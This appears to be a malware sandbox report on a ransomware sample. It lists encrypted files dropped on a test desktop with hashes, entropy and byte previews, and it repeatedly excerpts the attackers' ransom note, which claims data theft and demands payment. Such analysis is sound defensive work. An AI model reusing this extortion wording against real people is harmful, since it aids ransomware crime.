              SSDEEP:24:8IJOH7tcoxGrH87qmg6/ppoJdmGfae7X27AaBTYxIC1T3IJl46+r8u8wMuN6+s:i7tkzkpUfNgAwaIC1sJGAuLMuN6T
              MD5:E6386242B86F450040FF5C25C1408FBC
              SHA1:8D415D295F158B66D33B578FED6311383422FCC1
              SHA-256:D34D9914A8CCEBB05E75261BF5C07B6CCE575354CD9CAA61DBDEB848FADB34F2
              SHA-512:2117633F060FFC1354564CFCFADB9A9A658F0B13AF3D9D1C2B3761386E73CCA3D520E5A0FBD6372309A19C250A1A92D89CEB86D92873C44FA36A2578C640E7B1
              Malicious:false
              Preview: .e.aD.V.=d..=.=<'I.Bj..d..3V..u.G...0#|R...!........jDh...dx....V..QY.?...yP.KW$Z7...l..{....5...[..2...L.......U...Z...$A.S....oU?.,.....r..kr.kQ..I.!....6~hP..L...%.rz..`V`6!.....Y.u.4G.y...n.I...}..gY.q|#E...X.Ma.i........ .0.E.....>1g.kO........V.C....m..(5..Id..R.2_.....T.6..i..N...&...,..<...!...F..$..?........kb.....Ou........r.PC[.0.%2..o.2...v..[|"..[v 0.....HGA...#.r.}.>.E......kJ..?.....z.N..........O..;.&....(`#fc.8...^..k.....0........1P....v..x.}.cJ/z..@..[x.x......ew2B+Y Bj...k.<X .k-....k.s..}K.e....U&...SZ,.Ts..kO>./H..;*o....J.9..m..Qc.;,.i.m..........LT..L....&.:.&c..Dw..h.gC........wn...`(.u..Kq.v.5..M_.i......sKz..6.'...,Z...dSrpD.]=V...wb.OS..f%.......vH..q...X.1..&).s.H.z.T.S.e..I,3S#[.....di. ...fm.+..i.k.F.~.I.>{C....n>....,`.7.Uc....i.V...h..7ZZO$.&./........1..b0..v.Q....\.....wLh..l.+3#y.w.a../G.V:.w..,@...Q...VQ.rK.%..B..0;.=e. ...........w....8...1:a...{.em.2....Dj.....-bb(..]a.Rx....z../R
              C:\Users\user\Desktop\ZGGKNSUKOP.mp3.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.819809847275574
              Encrypted:false
              SSDEEP:24:6yyyVazqgmBTvw6f6vVdxI5HFv2doVP2bNRGOP:szb6f6vi5l7cNR5P
              MD5:7590C277374C4CC656BC5B2F58FCDF38
              SHA1:1FAB434C26A192660EA2A39913148A43375F6624
              SHA-256:65C8DF9D40443BF89C3C7B99FA10304A55E1EAAB63FC4276CD77FFE3727C7B00
              SHA-512:789D3260B2F3A30F9F1F6EDB9E662255551725A95C7E50C27A70953D3C26A2C346E6BA9C4CF69B6C26869F731AD2D4A6627AE31112651C4929B187AC6C785EBB
              Malicious:false
              Preview: o.F..'7.R.,.9...........A..6...E....z``!.......A...@37.6......oa..NQ.>LN....q.v.!.1B.A.e.k8[>....._..LBP.Lr...y|.t..MJx....M...I...4..<y.4+`....p.H+..'......:../.......js.R0....^e...v...Lb.&.q..,.............$...W.|.!..{i.|..\%...V...z.... ./73.Ib..Lt....Zm.3.....a+....]...!...blpO...N.j~w..Y%...../.a..o.1..|...J....b.lTFy..BxSN.U(R.......<H..a..I"..5*..{,..}......'.kq..dc.v.].rc..r.7R.n.y._...tj........?.........8<.L.....+>(T.n].:.]YD.1?..!.:. ...d.QW...4.J:I.Q..yY_..g.9..Nm..p...&.u.. 4.....E...}U.....8.....;""8Ba....M.........uf..m6...=...f.+....J...'.^q.....T.bH.X....*.g.w.c...C..]..".~.*..S.P.YQ_^b..(.X.@....u.a....n....2g........c....1=.f.>v..29..\.......-.....I^K....Uu..+.&.a;3....I...6.c....B....(....U\\..}?.....}.3..[...u..*.O..Yl..o5..|-t{..9..!e....{...[U'-..:'.%.{..X..{q.>...C.kO%.9I:.C.....\.....G..-..d5.g.f....L._.......F....>T.i.v............<.S.B.?.x.E./.........F....@.c...]..g.TD.*.%..e.y..b.6[(.K...2!..Y.......a.*7
              C:\Users\user\Desktop\ZQIXMVQGAH.xlsx.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.818179952849438
              Encrypted:false
              SSDEEP:24:IqddeL78pGZb5jtRkrm2b9MPeOG3HyWwcDofKEdNTuDndkd4OwsWhvaEt:IaUv88bOrNb9pmcUCEldcBaEt
              MD5:A3140E431D3C79523D71377D67B2BDB3
              SHA1:4C2B72D2A2D3180F2C7D27E2777BB12CB3D40615
              SHA-256:C600FBB6CC116A1FADA70E40F94B083BC099F1EAD791ABEB0FED05D9A3C11608
              SHA-512:28F6D447018A197D5F7B92B0CC5ADB01F3B5B52192BCFFE3B2CA6B7E8218B558CEE2AAB7820680EB1A86CEFE9BA9E42AF5243073CE1EC19E5B21F2BF8AF6989B
              Malicious:false
              Preview: l.5..%>.i..B.."},0....I..\.k..."V.K...._...P..Q...N.dL8.B.7.~..`.-..m...Z&. ....%.94..M..<}].V.....g.....pB.......{8.2.Q.....3...@M.AV.8.V..!._x.F=x:...R.7P..1..UK...&V.E....O;.t.X%.2;J..$.9".Gl9..Eh...}...o/~.'.E=/]...Kk.i...Z..Sx.=...D.[^d..Z=....t3v......g...?...X..z...@...U;......l!O.....Km.._..._.\.-.!T.N;..+."!.$... .......V.....k.......DOxw~./..F..S...z...b....y<.TO.'..L..!..?.-.f}.h......F..%l...U..~TD...c..a..3 ..]....5..;,.h.c...!zC..H....u+A/.6.6.2x.U..K..b2U...r...l?.s.L>..$...F..@9r\b.wvD;$./.F.lw.b..t.@=.5z..Q&..j...T.....g......v=.....3<.!./,8.....].......p.$.9..<....M.. .i...o.{!......E.q.4..[..Z..k.....H.V'.g.g..H,..'ccO .?..o..r.....2o...9+.H.IY>..5.b:.i!.P.4..x.-R@X.q..H..A.?....#..Q.M..+B..........-''.!%k.n.yH..X.l...... .....T#...94[@O_K.w.0.8.?....8.7.?U.`......3...b8o.K................rL>.]..^E~...!$..o....f6...J....B..6.GG...F4M......RZ.*..b~ch.7..m%..V.zq....t..IF.1m.y.a.yIo{.!"..z...A*y.=..3..*.)iZLLf..l.'.)..I{.F
              C:\Users\user\Desktop\kVuoJyeoW.README.txt
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1548
              Entropy (8bit):4.479946811569468
              Encrypted:false
              SSDEEP:24:NVB4loz8mP/NA1jo66DUetcYRTxRax/ncQcPVs5V0k7jO5K3yFHsZkJP1l:V4lAnNAZo66uYNxZ1Ns8eOmyuZotl
              MD5:F66968C47A64569E2281F65A95991BE0
              SHA1:EF9E3E80BFBEA4C3021B226CB8CD00687013B8A8
              SHA-256:4B950C763006E7C4569DF8742855CEC31BF82F835BD7E2BDCB5F128DB34C82BF
              SHA-512:CB4ACE1B3E891AB100B3950C6BC133B216E91C8978A3AF1FFD75617B606BB7CEB0133F44D37A30A827655E5B84B016D736A732F5F37635BB727E1A5B722CAD24
              Malicious:false
              Preview: ~+ .. * +.. ' BLACK |.. () .-.,='``'=. - o - .. '=/_ \ | .. * | '=._ | .. \ `=./`, ' .. . '=.__.=' `=' *.. + Matter +.. O * ' .....>>> What happens?.. Your network is encrypted, and currently not operational. We have downloaded 1TB from your fileserver... We need only money, after payment we will give you a decryptor for the entire network and you will restore all the data.....>>> What guarantees? .. We are not a politically motivated group and we do not need anything other than your money. .. If you pay, we will provide you the programs for decryption and we will delete your data. .. If we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. .. We always keep
              C:\Users\user\Documents\BJZFPPWAPT\kVuoJyeoW.README.txt
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1548
              Entropy (8bit):4.479946811569468
              Encrypted:false
              SSDEEP:24:NVB4loz8mP/NA1jo66DUetcYRTxRax/ncQcPVs5V0k7jO5K3yFHsZkJP1l:V4lAnNAZo66uYNxZ1Ns8eOmyuZotl
              MD5:F66968C47A64569E2281F65A95991BE0
              SHA1:EF9E3E80BFBEA4C3021B226CB8CD00687013B8A8
              SHA-256:4B950C763006E7C4569DF8742855CEC31BF82F835BD7E2BDCB5F128DB34C82BF
              SHA-512:CB4ACE1B3E891AB100B3950C6BC133B216E91C8978A3AF1FFD75617B606BB7CEB0133F44D37A30A827655E5B84B016D736A732F5F37635BB727E1A5B722CAD24
              Malicious:false
              Preview: ~+ .. * +.. ' BLACK |.. () .-.,='``'=. - o - .. '=/_ \ | .. * | '=._ | .. \ `=./`, ' .. . '=.__.=' `=' *.. + Matter +.. O * ' .....>>> What happens?.. Your network is encrypted, and currently not operational. We have downloaded 1TB from your fileserver... We need only money, after payment we will give you a decryptor for the entire network and you will restore all the data.....>>> What guarantees? .. We are not a politically motivated group and we do not need anything other than your money. .. If you pay, we will provide you the programs for decryption and we will delete your data. .. If we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. .. We always keep
              C:\Users\user\Documents\BNAGMGSPLO.jpg.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.826582191243812
              Encrypted:false
              SSDEEP:24:8/r1jfibgAj7PdGYoNm4Iqz080F9czb3I1mv9tNCVwtirrRBbJ/6o:8T1jJAjDdEU5DL+IIMwYrFn
              MD5:31D05CF6E7A8968309027AB526F47DA9
              SHA1:65AE1D5F7134EE4EFD3275D45EC94D5CC2B15157
              SHA-256:BA2CBEF103F4995DFC2F05E3C41F71322312E7C401FD29B1E320AF0549909F18
              SHA-512:D6FA4C1F3DD42D81EF2825937F33B0A5D1028A1FBBEC5944EB4B39136E45028CAC1082F6A3404D2966C3340CF9B64632DA534B7158192E3D681A26BD69539CE9
              Malicious:false
              Preview: vgC....../..0s.......H.V.F....c.F@}o...|..Z.F.P...;...h...O.+.j.KB.......[.K)Dp.r.8.dZ.l...H!X..Q....2.<...Y.pQy.NO...\..jZ........>I7|..J..@h...^`'n.....L..2.n'..D..c`C.i.Y...i..._....:M...FE2...>_R......C..0_...l....-..G....JY)0.......L.S.(@.........y:.[.'4!.2....v...V?.J{)....}.z..f.. "..&0..'..B......6...v./..'.d.....E.W..i....}..K.ZSbm+7`....M.p.c.j..:.....~U.4...e./tz..].z...9.@..s.6Se..s...V...B. \.rJ...s.+...;.?....rbm.T.9....AP....I(.......|$........o.O...Pn.n.....C...V.r|.R..M1tZ..R.....).i..........X......w.....D}....o.hsO..l~h....h......Z?..j.....A.h.+}...{.&.^.}....g.......!.g...5....YK7M.c...M.-3.+.S...n~....Y~xc...6..{...~-.S<.....~....).b..g....r..c.....M>....sFm..{fQa..t.$.....&....`.%.Sf.P..V1..|.D...H1.^...b0..Y[&%Y......*....s)....o...^n\d&......3..".O.........P..%..Ya ...\%..O4..j..(..d..V.7....R...6.c....jT)g....x.7........+.6)......#.....p\{..`fq[...|a{....|...V6|C.N..L9a..... V.*...3.T:...dH...>$.....z.z...x.....
              C:\Users\user\Documents\BNAGMGSPLO.xlsx.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.826718117926107
              Encrypted:false
              SSDEEP:24:UOFs77e9cLHSoZhVc0SWX4KWEx4A2R/ASbXYgD+9QXJ2hkN86Wo3:UOKve4yI1SWX4Klx4J/ASboIdyo3
              MD5:21B975B46609E322D46439D62A0C7F30
              SHA1:7F614B5EF7058F60E03DCF85B4411F9E98B0ED02
              SHA-256:8ED8031C512FEAC88883208C6F38B49EE335F9DCC00D6826851C1C73FF69DABF
              SHA-512:759B12FC353443048271FD86CD066DDCDEDC58B2FB70399C4E3C23757F6BB1BB6B6BF5D86ED54F92477C772F6513C06E8338996376586B88895D2B82FE8BAB47
              Malicious:false
              Preview: BU.V.z...xr)4:.'...E.q...f........p.....zk...E8_H?bu>.\..R..:.Y.|.#.?D.o.Hv....!........v..K.+A.s.n.K..}....X)e..4t*...;.x.Oq......~..\0R{.?E_E..W)'|........q./'.&mH..&..^G$P...|.{..S...x<..w.}...:.k...5.._<...c.. ..]2Yk....m.q ...'..DN...M..&YXG..D...!<..E.}9.m..&.G$.S.*.._.)..u[Q.. ....i..C.W.......U6.{H....3.a.$-..X.2.).-V...\:..bt..,.-.....8...L.......^..1.yERe7O.3n..&....F.N....."... ...(......&8b.@K...e7U.......g..,....A.....@i...."..'7F..:.JH...AC...[.......Z.C7{.?.xZ....;.SJngW....=....{6f.o.J.....".....ff.^......^}3.kQO;|..}.o....23.+:..Ob6.......4...8M.1....v.R..,.*2...m-F.Gi._..,.).....WE..4<O..Z....I.....b....S...J..B.........4.n....E^.....`j]u..@..f2O.s...H.UY|>r5w..exh.F..uN..\....nEx...@.B.Q.W..i.@.h.........D.T4M`Z.t;...+..c..Gb...Y.y}.....m.zL.C.`)j...`.R C.4.]0...[...+.D..o..7;.g.]\....c ....4T.>.K......;.s.R*.{.o......3.E.....)y..8..7<..<.K-...X.f..-.G...&}.E.~U`s.>r2I..3......*.x...z.:3<....V..QY.H..-q8.f/.q..V....`HX.".a
              C:\Users\user\Documents\BNAGMGSPLO\kVuoJyeoW.README.txt
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1548
              Entropy (8bit):4.479946811569468
              Encrypted:false
              SSDEEP:24:NVB4loz8mP/NA1jo66DUetcYRTxRax/ncQcPVs5V0k7jO5K3yFHsZkJP1l:V4lAnNAZo66uYNxZ1Ns8eOmyuZotl
              MD5:F66968C47A64569E2281F65A95991BE0
              SHA1:EF9E3E80BFBEA4C3021B226CB8CD00687013B8A8
              SHA-256:4B950C763006E7C4569DF8742855CEC31BF82F835BD7E2BDCB5F128DB34C82BF
              SHA-512:CB4ACE1B3E891AB100B3950C6BC133B216E91C8978A3AF1FFD75617B606BB7CEB0133F44D37A30A827655E5B84B016D736A732F5F37635BB727E1A5B722CAD24
              Malicious:false
              Preview: ~+ .. * +.. ' BLACK |.. () .-.,='``'=. - o - .. '=/_ \ | .. * | '=._ | .. \ `=./`, ' .. . '=.__.=' `=' *.. + Matter +.. O * ' .....>>> What happens?.. Your network is encrypted, and currently not operational. We have downloaded 1TB from your fileserver... We need only money, after payment we will give you a decryptor for the entire network and you will restore all the data.....>>> What guarantees? .. We are not a politically motivated group and we do not need anything other than your money. .. If you pay, we will provide you the programs for decryption and we will delete your data. .. If we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. .. We always keep
              C:\Users\user\Documents\DUUDTUBZFW.jpg.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.8373934258713716
              Encrypted:false
              SSDEEP:24:gkFh+lOBgUmkfn7ZPk5HdOxvL3WofDwD5GGMJzdqqH/Z6URvx8:gk7j6Umgn1wdOxj39wJPqH/4Us
              MD5:D4BC77B6F9A37AF2C437F25E6CB70C38
              SHA1:FAE6F9D8C8D67B967250AE25E25D2C57D14524B2
              SHA-256:4C2BC796E814599F977CEFC0257D662D65C38271768B29EC86E3053826D00127
              SHA-512:73CF35FC1C19598F1DAA2528D46770F185471EA66E414B9E77C97AC0D7FCF22E7C176570A3006F00141C3512DA1EA95A5085FF58006FC8DFF90762EC3EA3FD23
              Malicious:false
              Preview: ..CN.dj.D......._d*...u..8g..y...b.+[N.>K..8Loa]......'P0m...@y..j..,..4...p..........G...:..4.*...o.".f.6n...f..L|..._. ....J.H...E.".m..V..x.G.Uq.....ba:.s..."y..Eu.Jo..6....cV..B ..=........+k7.R.)..P{............O.a.M.Ml.k,....%..^p..G...=._.....:|0...T......s=...l......'W..yJ....]#*..%nI{j.,.M.......BR.[q&.2...B. .[.?Vb..k...6...@...k2....W...Xt..Di...s....\@)....2..h.C.>Tto..,.......:.$..X..1.&.>...hg..7.L3...e6....n....rI.m`..V....`.r>"..6.yy:+;..Z..p#..]..j....S....u.*b.....j.S.9N.....b.@.j........^3.CBQ0."..q.e..\..W>.O..). aL*.^v^...:.97.0.t'.1...p.&Y...W.fU.?.H.?.....s<.[.<...r...p..qL-.5.RSA..C_..'.$..t..Bp..u......No.T....p..6.K.x.......8x.K.Z...\M.hu...CVSL~..y2d..@...]...E..If......$..})..BEk~>.C./..o2...sf8.R.@.....K.I.w...._V..P...<.. .W....q.Y..R*S...UY......w...(.e../.Bof...~...:S.W..&...&.s.......Jz.*.=`.X..gB.a..a[C..w.....3.....T.4.W.... :.K.lUJ.y....q...m...a.r..d.v$$wD:...........q4.0....".1|u....z........
              C:\Users\user\Documents\DUUDTUBZFW\kVuoJyeoW.README.txt
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1548
              Entropy (8bit):4.479946811569468
              Encrypted:false
              SSDEEP:24:NVB4loz8mP/NA1jo66DUetcYRTxRax/ncQcPVs5V0k7jO5K3yFHsZkJP1l:V4lAnNAZo66uYNxZ1Ns8eOmyuZotl
              MD5:F66968C47A64569E2281F65A95991BE0
              SHA1:EF9E3E80BFBEA4C3021B226CB8CD00687013B8A8
              SHA-256:4B950C763006E7C4569DF8742855CEC31BF82F835BD7E2BDCB5F128DB34C82BF
              SHA-512:CB4ACE1B3E891AB100B3950C6BC133B216E91C8978A3AF1FFD75617B606BB7CEB0133F44D37A30A827655E5B84B016D736A732F5F37635BB727E1A5B722CAD24
              Malicious:true
              Preview: ~+ .. * +.. ' BLACK |.. () .-.,='``'=. - o - .. '=/_ \ | .. * | '=._ | .. \ `=./`, ' .. . '=.__.=' `=' *.. + Matter +.. O * ' .....>>> What happens?.. Your network is encrypted, and currently not operational. We have downloaded 1TB from your fileserver... We need only money, after payment we will give you a decryptor for the entire network and you will restore all the data.....>>> What guarantees? .. We are not a politically motivated group and we do not need anything other than your money. .. If you pay, we will provide you the programs for decryption and we will delete your data. .. If we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. .. We always keep
              C:\Users\user\Documents\EEGWXUHVUG.png.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:COM executable for DOS
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.8096534902196
              Encrypted:false
              SSDEEP:24:DYniozrfY8CWPCEs0EENUIqyziE/8rqkbznloozCFzEW7lkkGFWDYUK:S5fYrWPCNI4yziD9znloNxG8U
              MD5:78CA8F890D1CA714E4C70B7BA40DBEEF
              SHA1:D0E8CA231984D40229BD8C17DCEAFAEAE2F03AE2
              SHA-256:FCC7C4DDD707CDB07FEA6637EC3EA90F5846BC6A19A350722F15EDF6F423D345
              SHA-512:2A83E7F2C2094EC502DD4468CE84237984587477581F535F63FC8724E65949F4407C37EFA92B926D6B1B905E7D5524FA1F1B9142B153523CC35B68ED74A325BC
              Malicious:false
              Preview: .....ke...+x...0...q..g.V..T.[...'.)&....(`p#...v.L.^G...5^$..p.mv.T.s.G........(V. ...c.x.#...f3.....F._.......V..T.l.f..q.$I...%I.A..U...}o>.......c.@.$.b.Y8.S,,=....G...&.*..m.hP......6..S.n...Sn.l.....+.+...gG.q..z....L.S....'.j.s....Jw..S'(..D..........N....0]V.Yl.G.......g..39.j6.....m..zh.B.U..Cl...<o.......?(.6f..&M..qM)......v.h.%}<.f.9.)5c.qBH.x.O..F.00r}|........}ue..c....M...../.'oV...]...&...>]$f....}..m.p.........y8..e.]+$........o..j...{L.i..../.(..a..EX..v....e......2?hx...(d......+.5|..q.FT..0.....0.:..6.e.q?-pp_F..|.V-..0Z..}..b.G].<oK48.>..ZC.I....d...c...#u...........H....8?.;.,,.~E.7..C.a>...Z.[..BE.$P@.V.....&g'..s.....7....9.f....g...../..UK(..?..x...7bc.<.(.1.....g._.......L...g...r.s~S.`..`!&.Y.o..ia.....Uq,1,.6.5.Pa..9?...h.....xk<>"u..G..........?8b.q.....a0_.T..J.!.]...X[M1?...,7:..V.....|L...wVm.J.@KF.z..0..._.."...u.L...l.o..2....o........l.?.s.hc....p.....>6...M...N..`...xi..I.k....Q....Gy...<..7.uD..
              C:\Users\user\Documents\EFOYFBOLXA.jpg.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.849150245353768
              Encrypted:false
              SSDEEP:24:ZSBoAhfHrgX3lLTDCR/UJyR1aaR7MoMo5RnvM0TZRnjxEPcpsH:gB7hfHstT2R/TCaRQMrnjxESsH
              MD5:0143BD0056B63FCFAA24B888E6667766
              SHA1:741EB24AB284CE20E4AA8547FA3D659F75C55DFB
              SHA-256:6F4764A82BE8879BE6C782BA5A58A96A92B59971E2D7859FD6C3BCE107CFB6C0
              SHA-512:468A0994109F17A06E795ECBFC05823A5998B859DDF5C801A8E08328B5B791BD8254DFD33891BF186BD099443E4778A3FFE92F120CC673164D306AA74792982E
              Malicious:false
              Preview: Z........c.Y...~W~8...{....(........#.9O.....i...LM#....p.<.e:{...>...<...z+Q...O..eTI..P~.[........u'*Yd.hD7"..P.(."i%.XcI...Y...z`k\......9H..".......V....n.].......U..V.*.$...w......w7....UG....@....x....^.Q...."=I.....G....m..l......b,'a..1.)g..-#/L7l`...5...u#.m..%...@...C.,@.c4.>m...d+..<.?.9....?}G..D...a...N..0y.............3.......c....l<V6.3r.K.u.=...2.%....(...'........8V.$.]PO.@w.mz/.^..!Q7...J...@.'....c.,._&;(....f..w-.YU..Fd...<.Y. .?.A.....dd.....X.~br\,..$|..C.q..>.......a6.._.....T.ht... .x}Q.........^%&........K.x.G...s.......?5...O.kS.B.."..tSBNG.SP[.%Wo.._...{.n.5....%.(j........sozS6.....}.(n/..2....x....[#. +O...N..B..$.I.4.M..[rn)2.KyE.....K.U.#.E.7...S@..s.....&y.E......9..G.JjP....<T.A..D._..d......d.....)..U.....+........j[.R.....`(..0.f..u.....U+.....<....Q.M..HfI.|?......S..Bx.U.-r........W.P...i.}...K.xL....+.O.\..!...c',../)...[.>....cx..5.8..H....v..J.fn.Zj.I...L...<.X...A9n.P;4.V..#0...s:..l
              C:\Users\user\Documents\EFOYFBOLXA.mp3.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.868370734192895
              Encrypted:false
              SSDEEP:24:XWhxrQiUsD5sztRUoJFP6C69pD4mVR+AX3araQGjxc1D5Iybn:ar+sVsxRUoXf69pUm/+AnaraSHDn
              MD5:F0CF11A856C175903C49D84BC1E1905F
              SHA1:95EC248A7275390B53B01CA171C1612EBD13D23B
              SHA-256:BAD07BA5ABC9B2E72200827067A6A6A59CECCDE27182D0CC46D35D25C944FD16
              SHA-512:F55D1AD494DE498FA06E1D2768D6C48081B1DE561958C6EB25BDC049291990CF8A19DB36DFDDAB854851B6FB4C52D65213254C62AE83AD62E90B4216FB123DD5
              Malicious:false
              Preview: .......S....Zn+.l.....t.A.z..N..O..<i..P.Zy...(..d..EZ....<.....@.Z......<.......!.i...g......@.@.b..a..Qw3...Mk.~3.....FKV7...J2;%..~...u.S...WJ3.`...0.......;...h.TE?|..i..Z....%..S+.Y..j/...)...^T.....=:.v..|......;.>`.|.P...JA...7N..#.:..{.J;..s...kP..8....~$5w.F.B81..#m.?*..a...wb./.^...1.D:o.r.,.5.1.WF...p..N..W...k"...$.~2...o..`......<s..i...e...C...._... . ].....bP...._.i..."V.:..ujZ<..$.K5.p..C9.O.~....X..b...U..uu...v..."+....7......Lz..vZ.t...t.4.sw.B."}."<.......a....yQ<lrR......]...eb..*..3.3..J.?..7.F...oGq.I.[..A..Z...R...fXfC.K.%XG..G0H%...<.vK..l..=.(../...Tr...(*..|..dK.W.*.!+...1..j...]..bb.....>J...1=9.VW....c..:...9...>.M.t..H.>Z.@..~^R.Y.......eJ..j.kSE......o.y..W.c.)~..G..`M...."L.($...+g7.F............v..._.u....Bs....'..G..HK..1........"6.WQ}^Q.Fa...#N.+.{{.n...4GDZ.<1..;.........%B.f.|..q..b.!..m.E0..q.....b9....l...:.-p.4]c.C......[Oe.RE)..'9......U..'.ra...<..[/D!..$...F?/.v.....M.u...xYe9a..X....."h.35..?g.. ..
              C:\Users\user\Documents\EFOYFBOLXA.pdf.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.836941374512803
              Encrypted:false
              SSDEEP:24:xckEIgKTEwzcELf4CfdnfGKjHO/tgh2vyX5v6dZ52AA4hJ:GkEIgKTEwZQ+9fNwgh2vEx6Bc4hJ
              MD5:2C75BB3E65C92F9966EA0A1455DA739B
              SHA1:FC78CF6E37A662F99914B9677CD59C37793F8484
              SHA-256:E485B582D0936D6E719CD04191A258DA7AE22FA1767B9E4040E04CB5F1B3EDB7
              SHA-512:A2692CE9B294A40B6F3BC2A78D7AD0788DC70A9A1E4A82ED979004E454EDFAF1ADFBD11BF8568F64591B1BFC48CD6EF97FB5E6A5B12ACB004D6B61C59EB0F284
              Malicious:false
              Preview: ...J.m1:5v...I.......@.1..L,.1....ex...2.._}..3.2.la....l..<J..[...I_.a...@.)z.Z...nz..gl@.9.~(.`..b..E..........C...S...^2&...j.!f....2^==.....<W .ZC....&..-.........h4c..8......7...4...B..m0.k..:c7..5^1.Z..9..5.j...0QJ..$8.y*.Qj.C=k.....}...)QE...C#z.._..-....MKi.B+)........N;.?..m@5....*K.=-.z*....).....p....{gdk...Z.-..W.. .d5..k&..!t.q@.V?.<...(b6. m.7...,.....t..F..O:...E._0M.}jKAn.=!6.....y^...f...B2..?+.l*C.. L...0HN.v.zRn.A..w.Rx...n..1....lwV...X.`.0kC..$9.OC..z%.?..G..........H...3j...a.....e.B.w...7.>....T2...T.N...l..Xqz.1.S....G._Og.$..sR.^..Zy."...........*.'.Dy..~.+..`...{JzjAA...G.#l..Ys,.y_...p.h.O.w@.;M.|`P..v....}t..M..5.,q.(....&..^q..O...b.... ..B.@|.2..j...A..k..<.wO.......C.w`.=..ZV..>.~...r......3.r.............w.....+.".+.T\%..'#....\N..aq{ 9....{..s<.@J......j[...v$.+.....K.#..,..yrq..--3.H.....m.o=...m....m8...C.{:?......_.=M..@s.Z0....*"..I..3@ ..\.@...0..a..........|..ht....Tb....%7<.....
              C:\Users\user\Documents\EWZCVGNOWT.png.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.830400318767949
              Encrypted:false
              SSDEEP:24:iSjUoKyceABxtxj5CsbUhxaqvmQeXrt99CLQwQM+/nKKgqUNYnxi:njtj/Aztxj5CsoaqvJqqMwmKKgeI
              MD5:28FFA8484DE0180CD11A1AB17D1B5DF3
              SHA1:012225942736F7971A4C5564370185C987AF9116
              SHA-256:A5897529D572774066A513667DE101FFF47F7A1412001C91D6FE137C5F148FD0
              SHA-512:5B4F62F94BB71F4089D181E8E0CA05FA403D981029884FACA89CAF21C924045AC0A3E6758D2C2BD9DD6792FC3EEDD6C41594308D4779FA3E05418B894D3CE6FB
              Malicious:false
              Preview: H:>.........b.Kg$5J.v..^>..E.~...4..KW.4..Y^..\;...}.>>.>.......`..ZR..DX...._6..3e,.Z....B4...>..,<.?.=...gn-.{.....k.g.<.........K.Y..H..c.9..M.....MXj...]Y..D.P..M,.Fn.ROA......krL.....5.|e..K.X.,.4$....Bn..z3.(*.}..k...aK#.d%t..3.D.r.O..|..4=.$..+..g'.<.9<.Y3A#..Cn..7./.....B.X..d*.<....1.o.|G.y...A.{.{./.-.P..UB.in..X.[...aOZ0qxAO5...Ops.0.....a..X.k.s...hm......W.~.D~..p."f.(F..R$...T..'U]...M.X(.....b.^.8.r.....j...6.k.,w...Iq.8...H.L..i..7.O.57`.l....g.L..'f.I.*.}..D..4......N..b......Y/........wL..0._...A..6O@..V(R:..K.K.n4-E.r....`\.......z.y..).=z.H.1..K..._...:..^.#...S.a...^BFv#g..{t#...).M.. .7D.."x.v....C...s.7.J..EN.Y..N..Q....Zlv..(..eP.x.y.r..M&.'...z...k.h...Gcc.......W..X..Cx.g0..h..}\h-...f.....t1.d....I...dK...;k6....UQX..Y7).......$z....Qq..7.|..*....W...&..n..R..*s.T.).......K.2n..".*..$....6.{D......V.?........'3.Q.>y.g..=^.Zkr.......{...3...-M..T.F....".T.kd...VJ..e.Rz...h4&I^.*.`..F(.~,2.+?8. ..5....P.....*.j.
              C:\Users\user\Documents\GAOBCVIQIJ.docx.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.826695239649664
              Encrypted:false
              SSDEEP:24:OVEFr7iXhXuSltHPRBX9jJrN0cqsDWMLzV33AyMMVrug/wuIKF:6GrWxXuo19jn9awVHA1MVrug/wuV
              MD5:7EDA155C718A63E841C908C33F6815D5
              SHA1:04B69355776E875E50FAD8A4A1C9608099C98D65
              SHA-256:A27F064851A4DBA36B78D11A2A09C82E4C90915BC8A34555FFDD9B44F307C981
              SHA-512:2B80031B7C8AE95FC8E78C32CDEE0ADA9039B4FDF5EB647864C41841B2503C02D8CC8C71A9B72AB3AE879D020D2A29EFE2C199D02101B7C71A68438C280813B1
              Malicious:false
